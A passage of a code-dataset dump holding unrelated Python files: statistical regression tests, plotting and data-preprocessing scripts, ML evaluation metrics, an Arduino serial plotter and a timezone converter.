p))\n        self.err_ss = np.zeros(p)\n        for pp in self._block_slices(p, max_cols):\n            if isinstance(self.Y, np.memmap):\n                Y_block = self.Y[:, pp].copy()  # copy to force a read\n            else:\n                Y_block = self.Y[:, pp]\n            #Y_block = self.Y[:, pp]\n            self.coef[:, pp] = np.dot(self.pinv, Y_block)\n            y_hat = np.dot(self.X, self.coef[:, pp])\n            err = Y_block - y_hat\n            del Y_block, y_hat\n            self.err_ss[pp] = np.sum(err ** 2, axis=0)\n            del err\n\n#        self.coef = np.dot(self.pinv, self.Y)\n#        y_hat = self.predict(self.X)\n#        err = self.Y - y_hat\n#        self.err_ss = np.sum(err ** 2, axis=0)\n        return self\n\n    def predict(self, X):\n        #from sklearn.utils import safe_asarray\n        import numpy as np\n        #X = safe_asarray(X)  # TODO PERFORM BASIC CHECK ARRAY\n        pred_y = np.dot(X, self.coef)\n        return pred_y\n\n\n    def t_test(self, contrasts, pval=False, two_tailed=True):\n        \"\"\"Compute statistics (t-scores and p-value associated to contrast)\n\n        Parameters\n        ----------\n        contrasts: The k contrasts to be tested, some list or array\n                   that can be casted to an k x p array.\n\n        pval: boolean\n            compute pvalues (default is false)\n\n        two_tailed: boolean\n            one-tailed test or a two-tailed test (default True)\n\n        Return\n        ------\n        tstats (k, p) array, pvals (k, p) array, df (k,) array\n\n        Example\n        -------\n        >>> import numpy as np\n        >>> import mulm\n        >>> X = np.random.randn(100, 5)\n        >>> Y = np.random.randn(100, 10)\n        >>> beta = 
np.random.randn(5, 1)\n >>> Y[:, :2] += np.dot(X, beta)\n >>> contrasts = np.identity(X.shape[1])\n >>> mod = mulm.MUOLS(Y, X).fit()\n >>> tvals, pvals, df = mod.t_test(contrasts, pval=True, two_tailed=True)\n \"\"\"\n contrasts = np.atleast_2d(np.asarray(contrasts))\n n = self.X.shape[0]\n t_stats_ = list()\n p_vals_ = list()\n df_ = list()\n for contrast in contrasts:\n #ccontrasts = np.asarray(contrasts)\n # t = c'beta / std(c'beta)\n # std(c'beta) = sqrt(var_err (c'X+)(X+'c))\n #Xpinv = scipy.linalg.pinv(X)\n cXpinv = np.dot(contrast, self.pinv)\n R = np.eye(n) - np.dot(self.X, self.pinv)\n df = np.trace(R)\n ## Broadcast over ss errors\n var_errors = self.err_ss / df\n std_cbeta = np.sqrt(var_errors * np.dot(cXpinv, cXpinv.T))\n t_stats = np.dot(contrast, self.coef) / std_cbeta\n p_vals = None\n if pval is not None:\n if two_tailed:\n p_vals = stats.t.sf(np.abs(t_stats), df) * 2\n else:\n p_vals = stats.t.sf(t_stats, df)\n t_stats_.append(t_stats)\n p_vals_.append(p_vals)\n df_.append(df)\n return np.asarray(t_stats_), np.asarray(p_vals_), np.asarray(df_)\n\n def t_test_maxT(self, contrasts, nperms=1000, two_tailed=True, **kwargs):\n \"\"\"Correct for multiple comparisons using maxT procedure. See t_test()\n For all parameters.\n\n Example\n -------\n >>> import numpy as np\n >>> import mulm\n >>> import pylab as plt\n >>> n = 100\n >>> px = 5\n >>> py_info = 2\n >>> py_noize = 100\n >>> beta = np.array([1, 0, .5] + [0] * (px - 4) + [2]).reshape((px, 1))\n >>> X = np.hstack([np.random.randn(n, px-1), np.ones((n, 1))]) # X with intercept\n >>> Y = np.random.randn(n, py_info + py_noize)\n >>> Y[:, :py_info] += np.dot(X, beta)\n >>> contrasts = np.identity(X.shape[1])\n >>> mod = mulm.MUOLS(Y, X)\n >>> tvals, maxT, df = mod.t_test_maxT(contrasts, two_tailed=True)\n \"\"\"\n #contrast = [0, 1] + [0] * (X.shape[1] - 2)\n tvals, _, df = self.t_test(contrasts=contrasts, pval=False, **kwargs)\n max_t = list()\n for i in range(nperms):\n \n perm_idx = np.random.permutation(self.X.shape[0])\n Xp = self.X[perm_idx, :]\n muols = MUOLS(self.Y, Xp).fit(block=self.block,\n max_elements=self.max_elements)\n tvals_perm, _, _ = muols.t_test(contrasts=contrasts, pval=False,\n two_tailed=two_tailed)\n if two_tailed:\n tvals_perm = np.abs(tvals_perm)\n max_t.append(np.max(tvals_perm, axis=1))\n del muols\n max_t = np.array(max_t)\n tvals_ = np.abs(tvals) if two_tailed else tvals\n pvalues = np.array(\n [np.array([np.sum(max_t[:, con] >= t) for t in tvals_[con, :]])\\\n / float(nperms) for con in range(contrasts.shape[0])])\n return tvals, pvalues, df, max_t\n\n def t_test_minP(self, contrasts, nperms=10000, two_tailed=True, **kwargs):\n \"\"\"Correct for multiple comparisons using minP procedure.\n For all parameters.\n\n Example\n -------\n >>> import numpy as np\n >>> import mulm\n >>> import pylab as plt\n >>> n = 100\n >>> px = 5\n >>> py_info = 2\n >>> py_noize = 100\n >>> beta = np.array([1, 0, .5] + [0] * (px - 4) + [2]).reshape((px, 1))\n >>> X = np.hstack([np.random.randn(n, px-1), np.ones((n, 1))]) # X with intercept\n >>> Y = np.random.randn(n, py_info + py_noize)\n >>> Y[:, :py_info] += np.dot(X, beta)\n >>> contrasts = np.identity(X.shape[1])\n >>> tvals, maxT, df = mod.t_test_minP(contrasts, two_tailed=True)\n \"\"\"\n tvals, pvals, df = self.t_test(contrasts=contrasts, pval=True, **kwargs)\n min_p = np.ones((contrasts.shape[0], nperms))\n perm_idx = np.zeros((self.X.shape[0], nperms + 1), dtype='int')\n for i in range(self.Y.shape[1]):\n Y_curr = self.Y[:, i]\n Yp_curr = 
np.zeros((self.X.shape[0], nperms + 1))\n\n            for j in range(nperms + 1):\n                if i == 0:\n                    perm_idx[:, j] = np.random.permutation(self.X.shape[0])\n                Yp_curr[:, j] = Y_curr[perm_idx[:, j]]\n            muols = MUOLS(Yp_curr, self.X).fit()\n            tvals_perm, _, _ = muols.t_test(contrasts=contrasts, pval=False,\n                                            two_tailed=two_tailed)\n            if two_tailed:\n                tvals_perm = np.abs(tvals_perm)\n            pval_perm = np.array(\n                [np.array([((np.sum(tvals_perm[con, :] >= tvals_perm[con, k])) - 1) \\\n                    for k in range(nperms)]) / float(nperms) \\\n                    for con in range(contrasts.shape[0])])\n            min_p = np.array(\n                [(np.min(np.vstack((min_p[con, :], pval_perm[con, :])), axis=0)) \\\n                    for con in range(contrasts.shape[0])])\n        pvalues = np.array(\n            [np.array([np.sum(min_p[con, :] <= p) \\\n                for p in pvals[con, :]]) / float(nperms) \\\n                for con in range(contrasts.shape[0])])\n        return tvals, pvalues, df\n\n    def f_test(self, contrast, pval=False):\n        #Ypred = self.predict(self.X)\n        #betas = self.coef\n        #ss_errors = np.sum((self.Y - self.y_hat) ** 2, axis=0)\n        # sklearn.utils.array2d no longer exists; np.atleast_2d does the same\n        # job of casting the contrast to a 2-D array\n        C1 = np.atleast_2d(contrast).T\n        n, p = self.X.shape\n        #Xpinv = scipy.linalg.pinv(X)\n        rank_x = np.linalg.matrix_rank(self.pinv)\n        C0 = np.eye(p) - np.dot(C1, scipy.linalg.pinv(C1))  # Orthogonal contrast to C1\n        X0 = np.dot(self.X, C0)  # Design matrix of the reduced model\n        X0pinv = scipy.linalg.pinv(X0)\n        rank_x0 = np.linalg.matrix_rank(X0pinv)\n        # Find the subspace (X1) of Xc1, which is orthogonal to X0\n        # The projection matrix M due to X1 can be derived from the residual\n        # forming matrix of the reduced model X0\n        # R0 is the residual forming matrix of the reduced model\n        R0 = np.eye(n) - np.dot(X0, X0pinv)\n        # R is the residual forming matrix of the full model\n        R = np.eye(n) - np.dot(self.X, self.pinv)\n        # compute the projection matrix\n        M = R0 - R\n        #Ypred = np.dot(self.X, betas)\n        y_hat = self.predict(self.X)\n        SS = np.sum(y_hat * np.dot(M, y_hat), axis=0)\n        df_c1 = rank_x - rank_x0\n        df_res = n - rank_x\n        ## Broadcast over self.err_ss of Y\n        f_stats = (SS * df_res) / (self.err_ss * df_c1)\n        if not pval:\n            return (f_stats, None)\n        else:\n            p_vals = stats.f.sf(f_stats, df_c1, df_res)\n            return f_stats, p_vals\n\n    def stats_f_coefficients(self, X, Y, contrast, pval=False):\n        return self.stats_f(contrast, pval=pval)\n\n","sub_path":"conpagnon/pylearn_mulm_deprecated/mulm/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"456225318","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdates\r\n#%%\r\n# Import both data tables into python using pandas. Set the index column to \"MESS_DATUM\" and parse the column values as dates. 
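Missing values are encoded as -999.0 in these files, so na_values maps them to NaN before resampling. 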
[1P]\ngarmisch = pd.read_csv("./data/produkt_klima_tag_20171010_20190412_01550.txt", sep = ";", index_col="MESS_DATUM", parse_dates=["MESS_DATUM"], na_values=-999.0)\nzugspitze = pd.read_csv("./data/produkt_klima_tag_20171010_20190412_05792.txt",sep = ";", index_col="MESS_DATUM", parse_dates=["MESS_DATUM"], na_values=-999.0)\n\n#%%\n# Clip the tables to the year 2018: [1P]\ngarmisch = garmisch["2018"]\nzugspitze = zugspitze["2018"]\n\n#%%\n# Resample the temperature data to monthly averages (" TMK") and store them in simple lists: [1P]\ngarmisch_agg = list(garmisch.resample("1M").mean()[" TMK"])\nzugspitze_agg = list(zugspitze.resample("1M").mean()[" TMK"])\n \n#%%\n# Define a plotting function that draws a simple climate diagram\n# Add the arguments as mentioned in the docstring below [1P]\n# Set the default temperature range from -15°C to 20°C and the precipitation range from 0mm to 370mm [1P]\ndef create_climate_diagram(df,\n                           temp_col,\n                           prec_col,\n                           title,\n                           output_filename,\n                           temp_range=(-15,20),\n                           prec_range=(0,370)):\n    """\n    Draw a climate diagram.\n    \n    Parameters\n    ----------\n    df : pd.DataFrame\n        Dataframe with values to plot from\n    temp_col : str\n        Name of temperature column\n    prec_col : str\n        Name of precipitation column\n    title : String\n        The title for the figure\n    output_filename : String\n        The name of the output figure\n    temp_range : Tuple of 2 Numbers\n        The minimum and maximum temperature values to display\n    prec_range : Tuple of 2 Numbers\n        The minimum and maximum precipitation values to display\n\n\n    Returns\n    -------\n    The figure\n    \n    """\n\n    fig = plt.figure(figsize=(10,8))\n    plt.rcParams['font.size'] = 16\n\n    ax2 = fig.add_subplot(111)\n    ax1 = ax2.twinx()\n    \n    \n    df_agg = df.resample(rule = "1MS", ).agg({temp_col:"mean", prec_col:"sum"})\n    print(df_agg.index)\n\n    # Draw temperature values as a red line and precipitation values as blue bars: [1P]\n    # Hint: Check out the matplotlib documentation how to plot barcharts. Try to directly set the correct\n    # x-axis labels (month shortnames).\n    ax2.bar(df_agg.index, df_agg[prec_col], color = "blue", width = 20, align = 'center')\n    ax1.plot(df_agg[temp_col], color= "red")\n    # Set appropriate limits to each y-axis using the function arguments: [1P]\n    ax2.set_ylim(prec_range)\n    ax1.set_ylim(temp_range)\n    # month labels on the x-axis\n    ax1.xaxis.set_major_locator(mdates.MonthLocator())\n    ax1.xaxis.set_major_formatter(mdates.DateFormatter("%b/%y"))\n    \n    \n    #plt.xticks(rotation=45)\n    fig.autofmt_xdate()\n    #ax1.set_xlim(df_agg.index[0],df_agg.index[-1] )\n    \n    # Set appropriate labels to each y-axis: [1P]\n    ax2.set_ylabel("Precipitation [mm]")\n    ax1.set_ylabel("Temperature [°C]")\n\n    # Give your diagram the title from the passed arguments: [1P]\n    plt.title(title)\n    \n\n    # Save the figure as png image in the "output" folder with the given filename. 
[1P]\n    plt.savefig(output_filename + ".png")\n    return fig\n#%%\n# Use this function to draw a climate diagram for 2018 for both stations and save the result: [1P]\ncreate_climate_diagram(garmisch, " TMK", " RSK", "klimadiagram", "garmisch")\ncreate_climate_diagram(zugspitze, " TMK", " RSK", "klimadiagram", "zugspitze")\n","sub_path":"create_climate_diagrams.py","file_name":"create_climate_diagrams.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"211175064","text":"\"\"\"Make an Account fixture available.\"\"\"\nimport os\nimport yaml\nimport pytest\n\nfrom account.account import Account\n\n\n@pytest.fixture(scope='session')\ndef account():\n    \"\"\"Return an Account object.\"\"\"\n    return Account()\n\n\n@pytest.fixture(scope='session')\ndef accounts():\n    \"\"\"Define accounts fixture.\"\"\"\n    path = os.environ.get('YML_PATH')\n\n    yml_file = open('{}/account.yml'.format(path), 'r')\n    accounts_yml = yml_file.read()\n    yml_file.close()\n\n    return yaml.safe_load(accounts_yml)\n","sub_path":"account/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"357269330","text":"from collections import Counter\n\nfrom task1.syllable_analyzer.const import TEXT_PATH, RES_PATH\nfrom task1.utils import preprocess, split_into_syllables\n\n\ndef main():\n    with open(TEXT_PATH, 'r', encoding='utf-8') as inp:\n        text: str = preprocess(inp.read())\n\n    c = Counter(split_into_syllables(text))\n\n    with open(RES_PATH, 'w', encoding='utf-8') as out:\n        for syllable, frequency in c.most_common():\n            out.write(f'{syllable} {frequency}\\n')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"task1/syllable_analyzer/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"523594686","text":"## Brute-force approach; takes relatively long to run\nnums = [3,3]\ntarget = 6 \nlens = len(nums)\nfor i in range(0,lens):\n    # start j at i+1 so the same element is not paired with itself\n    for j in range(i+1,lens):\n        if nums[i]+nums[j] == target:\n            print(list([i,j]))\n\n#return []\n\n","sub_path":"1_1.py","file_name":"1_1.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"187568349","text":"import numpy as np\nimport warnings\nimport sklearn.metrics\nimport tqdm\n\n\nclass LinkAUC:\n    def __init__(self, G, nodes=None):\n        self.G = G\n        self.nodes = list(G) if nodes is None else list(set(list(nodes)))\n        if self.G.is_directed():\n            warnings.warn(\"LinkAUC is designed for undirected graphs\", stacklevel=2)\n\n    def _similarity(self, v, u, ranks):\n        dot = 0\n        l2v = 0\n        l2u = 0\n        for group_ranks in ranks.values():\n            ui = group_ranks.get(u, 0)\n            vi = group_ranks.get(v, 0)\n            l2u += ui*ui\n            l2v += vi*vi\n            dot += ui*vi  # accumulate; a plain '=' kept only the last group's term\n        if l2u == 0 or l2v == 0:\n            return 0\n        return dot / np.sqrt(l2u*l2v)\n\n    def evaluate(self, ranks, max_negative_samples=2000):\n        negative_candidates = list(self.G)\n        if len(negative_candidates) > max_negative_samples:\n            negative_candidates = np.random.choice(negative_candidates, max_negative_samples)\n        real = list()\n        predicted = list()\n        for node in tqdm.tqdm(self.nodes, desc=\"LinkAUC\"):\n            neighbors = self.G._adj[node]\n            for positive in neighbors:\n                real.append(1)\n                predicted.append(self._similarity(node, positive, ranks))\n            for negative in 
negative_candidates:\n if negative != node and negative not in neighbors:\n real.append(0)\n predicted.append(self._similarity(node, negative, ranks))\n fpr, tpr, _ = sklearn.metrics.roc_curve(real, predicted)\n return sklearn.metrics.auc(fpr, tpr)\n\n\nclass MultiUnsupervised:\n def __init__(self, metric_type, G):\n self.metric = metric_type(G)\n\n def evaluate(self, ranks):\n evaluations = [self.metric.evaluate(group_ranks) for group_ranks in ranks.values()]\n return sum(evaluations) / len(evaluations)\n\n\nclass MultiSupervised:\n def __init__(self, metric_type, ground_truth):\n self.metrics = {group_id: metric_type(group_truth) for group_id, group_truth in ground_truth.items()}\n\n def evaluate(self, ranks):\n evaluations = [self.metrics[group_id].evaluate(group_ranks) for group_id, group_ranks in ranks.items()]\n return sum(evaluations) / len(evaluations)\n\n","sub_path":"pygrank/metrics/multigroup.py","file_name":"multigroup.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"181609659","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@date: 2020/4/28 上午10:32\n@file: accuracy.py\n@author: zj\n@description: 计算Top-1 correct rate\n\"\"\"\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision.models import alexnet\nfrom torchvision.datasets import CIFAR10\nimport torchvision.transforms as transforms\n\nfrom utils import util\n\n\ndef topk_accuracy(output, target, topk=(1,)):\n \"\"\"\n 计算前K个。N表示样本数,C表示类别数\n :param output: 大小为[N, C],每行表示该样本计算得到的C个类别概率\n :param target: 大小为[N],每行表示指定类别\n :param topk: tuple,计算前top-k的accuracy\n :return: list\n \"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, largest=True, sorted=True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\ndef compute_accuracy(data_loader, model, device=None, isErr=False):\n if device:\n model = model.to(device)\n\n epoch_top1_acc = 0.0\n epoch_top5_acc = 0.0\n for inputs, targets in data_loader:\n if device:\n inputs = inputs.to(device)\n targets = targets.to(device)\n\n # forward\n # track history if only in train\n with torch.no_grad():\n outputs = model(inputs)\n # print(outputs.shape)\n # _, preds = torch.max(outputs, 1)\n\n # statistics\n res_acc = topk_accuracy(outputs, targets, topk=(1, 5))\n epoch_top1_acc += res_acc[0]\n epoch_top5_acc += res_acc[1]\n\n if isErr:\n top_1_err = 1 - epoch_top1_acc / len(data_loader)\n top_5_err = 1 - epoch_top5_acc / len(data_loader)\n return top_1_err, top_5_err\n else:\n return epoch_top1_acc / len(data_loader), epoch_top5_acc / len(data_loader)\n\n\nif __name__ == '__main__':\n transform = transforms.Compose([\n # transforms.ToPILImage(),\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n\n # 提取测试集\n data_set = CIFAR10('./data', download=True, train=False, transform=transform)\n data_loader = DataLoader(data_set, shuffle=True, batch_size=128, num_workers=8)\n\n num_classes = 10\n model = alexnet(num_classes=num_classes)\n\n device = util.get_device()\n epoch_top1_acc, epoch_top5_acc = compute_accuracy(data_loader, model, device=device)\n print('top 1 acc: {:.3f}'.format(epoch_top1_acc))\n print('top 5 acc: 
{:.3f}'.format(epoch_top5_acc))\n","sub_path":"py/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"232024916","text":"'''\n\tAuthor: Vedesh Karampudi\n\tPython Version: 3.6.3\n'''\nimport json\n\nclass CreateDataset:\n\tdef __init__(self, filename):\n\t\tself.filename = filename\n\n\tdef createParagraphsAndQuestionsFiles(self):\n\t\tparagraphs = []\n\t\tjson_paragraph = []\n\t\tjson_question = []\n\t\tparagraph_json_filename = \"data/SQuADdev_paragraphs.json\"\n\t\tquestion_json_filename = \"data/SQuADdev_questions.json\"\n\t\tparagraphs_text_filename = \"data/SQuADdev_paragraphs.txt\"\n\t\twith open(self.filename) as dataset_file:\n\t\t\tdataset_json = json.load(dataset_file)\n\t\t\tdataset = dataset_json['data']\n\t\tparagraph_id_count = 0\n\t\tquestion_id_count = 0\n\t\tf = open(paragraphs_text_filename,'a')\n\t\tfor article in dataset:\n\t\t\tfor paragraph_json in article['paragraphs']:\n\t\t\t\tparagraph = paragraph_json['context']\n\t\t\t\tparagraph = str(paragraph)\n\t\t\t\tf.write(paragraph + '\\n' + '\\n')\n\t\t\t\tparagraph_object = {\"id\": paragraph_id_count, \"text\": paragraph}\n\t\t\t\tjson_paragraph.append(paragraph_object)\n\t\t\t\tfor question_answer in paragraph_json['qas']:\n\t\t\t\t\tquestion_text = question_answer[\"question\"]\n\t\t\t\t\tquestion_text = str(question_text)\n\t\t\t\t\tquestion_object = {\"id\": question_id_count, \"text\": question_text, \"paragraph_id\": paragraph_id_count}\n\t\t\t\t\tjson_question.append(question_object)\n\t\t\t\t\tquestion_id_count+= 1\n\t\t\t\tparagraph_id_count+= 1\n\t\t\twith open(paragraph_json_filename, 'w') as paragraph_file:\n\t\t\t\tjson.dump(json_paragraph,paragraph_file)\n\t\t\twith open(question_json_filename, 'w') as question_file:\n\t\t\t\tjson.dump(json_question, question_file)\n\t\tf.close()\n\nclass DocumentSplitter:\n\tdef __init__(self, filename):\n\t\tself.filename = filename\n\n\tdef getParagraphs(self):\n\t\tself.paragraphs = []\n\t\twith open(self.filename,'r') as inputFile:\n\t\t\ttext = inputFile.read()\n\t\t#paragraphs_list = re.split('\\n\\n',text)\n\t\tparagraphs_list = text.split('\\n\\n')\n\t\tfor paragraph in paragraphs_list:\n\t\t\tparagraph = str(paragraph) # converting text to string\n\t\t\tif paragraph is '':\n\t\t\t\tcontinue\n\t\t\tself.paragraphs.append(paragraph)\n\t\treturn self.paragraphs\n\n\n","sub_path":"data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"226563545","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 7 10:31:35 2016\r\n\r\n@author: Larry\r\n\"\"\"\r\nimport math\r\n\r\n# INPUTS\r\n# TP := the number of true positives\r\n# TN := the number of true negatives\r\n# FP := the number of false positives\r\n# FN := the number of false negative\r\n#\r\n# OUTPUTS\r\n# matthews := the matthews correlation coefficient\r\n\r\n\r\ndef matthews_correlation_coefficient(TP, TN, FP, FN):\r\n numerator = TP*TN - FP*FN\r\n denominator = math.sqrt((TP+FP)*(TP+FN)*(TN+FP)*(TN+FN))\r\n matthews = numerator / denominator\r\n return matthews\r\n","sub_path":"matthews_correlation_coefficient.py","file_name":"matthews_correlation_coefficient.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"576272607","text":"from sklearn.svm import SVC\r\nfrom sklearn.model_selection import KFold\r\nimport pickle\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nsubs_acc = np.zeros((10,32))\r\n#subs_acc = np.zeros((10,16))\r\nrank = np.array(pd.read_excel('rank.xlsx'))\r\n\r\nfor idx, sub in enumerate([1, 2, 4, 7, 12, 13, 15, 25, 26, 29]):\r\n feat_ord = rank[:,idx] - 1 # each subject에 해당하는 column 반환\r\n \r\n for m in range(32):\r\n# for m in range(16):\r\n \r\n exec(\"data = np.array(pd.read_pickle('./sub{}/pca_data'))\".format(sub))\r\n exec(\"label = np.array(pd.read_pickle('./sub{}/pca_label'))\".format(sub))\r\n \r\n data = data[:,feat_ord[:m+1]] # new feature order\r\n \r\n# data = data[:,:m+1]\r\n \r\n # for csp\r\n# fr_m = [e for e in range(m+1)]\r\n# bk_m = [31-e for e in range(m+1)]\r\n# fr_m.extend(bk_m)\r\n# data = data[:,fr_m]\r\n \r\n sum_acc = np.zeros((45,))\r\n kf = KFold(n_splits=45)\r\n svm = SVC(gamma='auto')\r\n i = 0\r\n for train_idx, test_idx in kf.split(data):\r\n svm.fit(data[train_idx], label[train_idx])\r\n score = int(svm.score(data[test_idx], label[test_idx]))\r\n# print(\"Test set score: %f\" % score)\r\n sum_acc[i] = score\r\n i += 1\r\n # \r\n average_acc = np.round(np.mean(sum_acc)*100, 3)\r\n# print(\"Total LOOCV accuracy: \", average_acc, '%')\r\n subs_acc[idx,m] = average_acc\r\n# print('===============================================')\r\n","sub_path":"SupportVectorMachine.py","file_name":"SupportVectorMachine.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"229260462","text":"#Jaehwan Lee, Ocober 2016\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport serial\nimport sys\nimport time\n\ndef connect():\n #try to connect\n try:\n print (\"Connecting Arduino\")\n ard = serial.Serial('COM6', 115200) #replace with whatever USB port\n time.sleep(2)\n except:\n print (\"Shit's really fucked\") #means arduino connection error\n #sys.exit(1)\n print (\"Connected.\")\n return ard\n\nstartTime = time.time() #For real time graph\n\n#Data Storage\nData = ''\ninChar = ''\n\nt = startTime-time.time() #Time since start\n\nplt.figure() #Creating Figure\nplt.ylabel(\"Angle\", fontsize=20)\nplt.xlabel(\"Time\", fontsize=20)\nplt.grid(True)\nplt.axis([0, 15, 0, 1000]) # Axis Ranges\nplt.ion() #interactive mode on\nline, = plt.plot([], [])\nplt.show(block=False) #Show graph\n\nard = connect() #Connect to arduino\nprint (\"what happened\")\nard.reset_input_buffer()\n#graphing\nwhile True:\n ard.reset_input_buffer()\n inChar = ''\n while not(inChar == '\\n'):\n inChar = ard.read()\n t = time.time() - startTime #keeping track of time\n inChar = ''\n while not(inChar == '\\n'):\n Data += inChar\n inChar = ard.read()\n line.set_xdata(np.append(line.get_xdata(), t))\n line.set_ydata(np.append(line.get_ydata(), float(Data)))\n plt.draw()\n Data = '' #clear var Data\n if t>15: #Axis Reset\n plt.cla() #clear axis\n plt.axis([0, 15, 0, 1000]) #Resetting the axis\n plt.grid(True)\n plt.ylabel(\"Angle\", fontsize=20)\n plt.xlabel(\"Time\", fontsize=20)\n line, = plt.plot([], []) #Resetting the line\n startTime = time.time() #go back to time 0\n plt.pause(0.05)\n","sub_path":"STARX_live_monitor_v5.py","file_name":"STARX_live_monitor_v5.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"456377266","text":"\"\"\"\r\n3 - Write a function that can take as an input a 
date/time in UTC (https://en.wikipedia.org/wiki/\r\nCoordinated_Universal_Time) and a desired timezone to change the time to (this should include\r\nthe main four US timezones, (https://en.wikipedia.org/wiki/\r\nTime_in_the_United_States#United_States_time_zones) Pacific, Mountain, Central and Eastern;\r\nChina time; and British Summer Time. An example input may be “18/02/2020 23:30” and “ET”.\r\n\"\"\"\r\n\r\nfrom datetime import datetime, timedelta\r\n\r\n\r\ndef change_timezone(date, time_zone):\r\n    \"\"\"\r\n    Change to desired timezone\r\n    \"\"\"\r\n    if time_zone.upper() == \"ET\":\r\n        date -= timedelta(hours=5)\r\n    elif time_zone.upper() == \"CT\":\r\n        date -= timedelta(hours=6)\r\n    elif time_zone.upper() == \"MT\":\r\n        date -= timedelta(hours=7)\r\n    elif time_zone.upper() == \"PT\":\r\n        date -= timedelta(hours=8)\r\n    else:\r\n        return \"Not a valid timezone, please try again.\"\r\n\r\n    return date.strftime(\"%d/%m/%Y %H:%M\")\r\n\r\n\r\ndate_string = input(\"Enter the date (DD/MM/YYYY): \")\r\ntime_string = input(\"Enter the UTC time in the 24hr format (HH:MM): \")\r\n\r\n# Convert the date and time string input to a datetime object.\r\ndate_UTC = datetime.strptime(date_string + \" \" + time_string, \"%d/%m/%Y %H:%M\")\r\n\r\n# Allow the user to choose a timezone.\r\ntimezone = input(\"Pacific: PT\\n\"\r\n                 \"Mountain: MT\\n\"\r\n                 \"Central: CT\\n\"\r\n                 \"Eastern: ET\\n\"\r\n                 \"Choose the timezone: \")\r\n\r\noutput = change_timezone(date_UTC, timezone)\r\nprint(output)\r\n","sub_path":"question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"257753607","text":"#!/usr/bin/env python\n# coding=utf-8\nimport numpy as np\nfrom scipy import optimize as opt\nfrom . 
import LogisticRegression\n\nimport os\n\ndef NAG(grad, x_0, L, sigma):\n '''Nesterov's Accelerated Gradient Descent for strongly convex functions'''\n\n x = y = x_0\n root_kappa = np.sqrt(L / sigma)\n if root_kappa < 5:\n L *= 9\n root_kappa *= 3\n r = (root_kappa - 1) / (root_kappa + 1)\n r_1 = 1 + r\n r_2 = r\n\n while np.linalg.norm(grad(y)) > 1e-15:\n print(np.linalg.norm(grad(y)))\n y_last = y\n y = x - grad(x) / L\n x = r_1*y - r_2*y_last\n\n return y\n\n\nclass GisetteClassification(LogisticRegression):\n def __init__(self, n_agent, kappa=1, **kwargs):\n\n super().__init__(n_agent, int(6000/n_agent), 5000, kappa=kappa, noise_ratio=None, **kwargs)\n # self.LAMBDA = 1e-8\n\n def _generate_data(self):\n\n def _load(fname):\n print('Loading %s' % fname)\n data_path = os.path.abspath(os.path.expanduser(fname + '.data'))\n with open(data_path) as f:\n data = f.readlines()\n data = np.array([[int(x) for x in line.split()] for line in data], dtype=float)\n\n label_path = os.path.abspath(os.path.expanduser(fname + '.labels'))\n with open(label_path) as f:\n labels = np.array([int(x) for x in f.read().split()], dtype=float)\n\n labels[labels < 0] = 0\n # label= np.array([[int(x) for x in line.split()] for line in data])\n return data, labels\n\n self.X_total, self.Y_total = _load('~/gisette_data/gisette_train')\n self.X_val, self.Y_val = _load('~/gisette_data/gisette_valid')\n\n # norm = np.linalg.norm(self.X_total, 2) / np.sqrt(self.m_total)\n norm = 6422.51797924869151756866\n self.X_total /= norm + self.LAMBDA\n \n self.X = self.split_data(self.m, self.X_total)\n self.Y = self.split_data(self.m, self.Y_total)\n\n self.x_min = self.w_min = NAG(self.grad, np.random.randn(self.dim), self.L, self.sigma)\n\n def validate(self, w):\n Y_hat = self.X_val.dot(w)\n Y_hat[Y_hat >= 0] = 1\n Y_hat[Y_hat < 0] = 0\n return np.mean(Y_hat == self.Y_val)\n\n\n\nif __name__ == '__main__':\n\n import matplotlib.pyplot as plt\n\n n = 10\n m = 1000\n dim = 10\n noise_ratio = 0.01\n\n p = GisetteClassification(n, m, balanced=False)\n p.grad_check()\n p.distributed_check()\n\n p = 